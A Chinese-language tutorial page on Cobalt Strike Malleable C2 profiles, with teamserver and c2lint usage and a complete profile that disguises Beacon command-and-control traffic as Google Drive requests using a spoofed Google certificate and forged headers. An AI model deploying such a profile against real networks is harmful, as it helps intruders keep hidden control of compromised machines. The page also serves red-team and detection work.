1.1. Malleable-C2-Profiles

profile文件介绍

Beacon的HTTP的indicators由Malleable-C2-profile文件控制,关于Malleable-C2-profile,它是一个简单的配置文件,用来指定如何转换数据并将其存储在transaction中,转换和存储数据的相同配置文件也从transaction中提取和恢复。

使用方法:./teamserver [external IP] [password] [/path/to/my.profile]

对于profile文件可以通过cobalt strike软件包中的c2lint文件进行检查,建议第一次使用的profile文件都检查一遍。

检查方法:./c2lint [/path/to/my.profile]

PS

  • 每次修改data.profile文件后,都要重启teamserver和listeners。。。不然要出问题

1.1.1. data.profile

# Make requests look like OneDrive web requests
#
# Author: @ChrisTruncer

#set https cert info
https-certificate {
    set CN       "*.google.com"; #Common Name
    set O        "Google Inc"; #Organization Name
    set C        "US"; #Country
    set L        "Mountain View"; #Locality
    set ST       "California"; #State or Province
    set validity "365"; #Number of days the cert is valid for
}

set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
set sleeptime "30000";
set pipename "mojo.5688.8052.183894939787088877##";
set jitter "15";
set dns_idle "8.8.4.4";
set dns_sleep "0";
set maxdns    "235";

http-get {
    set uri "/scs/drive-static/js/3.14/";
    client {

        metadata {
            base64;
            prepend "OSID=";
            header "Cookie";
        }

        header "Host" "drive.google.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US;q=0.3,en;q=0.2";
        header "Accept-Encoding" "gzip, deflate";
        header "DNT" "1";
    }

    server {
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Cache-Control" "public, max-age=31536000";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";
        header "Alternate-Protocol" "443:quic,p=1";

        output{
            prepend "try(";
            prepend "O(L.Oa(),\"sy580\")";
            prepend "N(L.Oa(),\"sy580\");P(L.Oa(),\"sy580\");";
            prepend ")catch(e)(_DumpException(e))";
            prepend "try(";
            prepend "O(L.Oa(),\"sy558\");";
            prepend "N(L.Oa(),\"sy558\");P(L.Oa(),\"sy558\");";
            prepend ")catch(e)(_DumpException(e))";
            prepend "try(";

            append "var f2=function(a)(a=a.wa;return\"application/chromium-bookmark-folder\"==a||\"application/chromium-root-folder\"==a||\"application/vnd.google-apps.folder\"==a||\"application/vnd.google-apps.photoalbum\"==a||\"application/vnd.google-apps.rollupphotoalbum\"==a)";
            append ",g2=function(a)(return a.ra),s8d=function(a)(return a?hb(a,function(a)(return new UP(a)):[]),h2=function(a)(switch(a)(case \"all\":case \"docs-images\":case \"docs-images-and-videos\":case \"docs-videos\":case \"documents\":case \"drawings\":case \"folders\":case \"forms\":case \"pdfs\":case \"presentations\":case \"sites\":case \"spreadsheets\":case \"tables\":return!0)return!1); O(L.Oa(),\"ak477\")";

            print;

        }
    }
}

http-post {
    set uri "/drive/ui/1/";
    client {
        parameter "ui" "s3212f5452";
        parameter "hop" "3620521";
        parameter "start" "0";
        header "Content-Type" "application/x-www-form-urlencoded;charset=utf-8";

        id {
            base64;
            prepend "OSID=";
            header "Cookie";
        }

        output{
            base64;
            print;
        }
    }

    server {
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";

        output {

            prepend "[[[\"apm\",\"";

            append "\"]";
            append ",[\"ci\",[]";
            append "]";
            append ",[\"cm\",[]";
            append ",[]";
            append "]";
            append "],'dkkasdh56sa0d45e1f']";

            print;
        }

    }
}

1.1.2. profile仓库

Copyright © d4m1ts 2022 all right reserved,powered by Gitbook该文章修订时间: 2021-10-09 15:03:11

results matching ""

    No results matching ""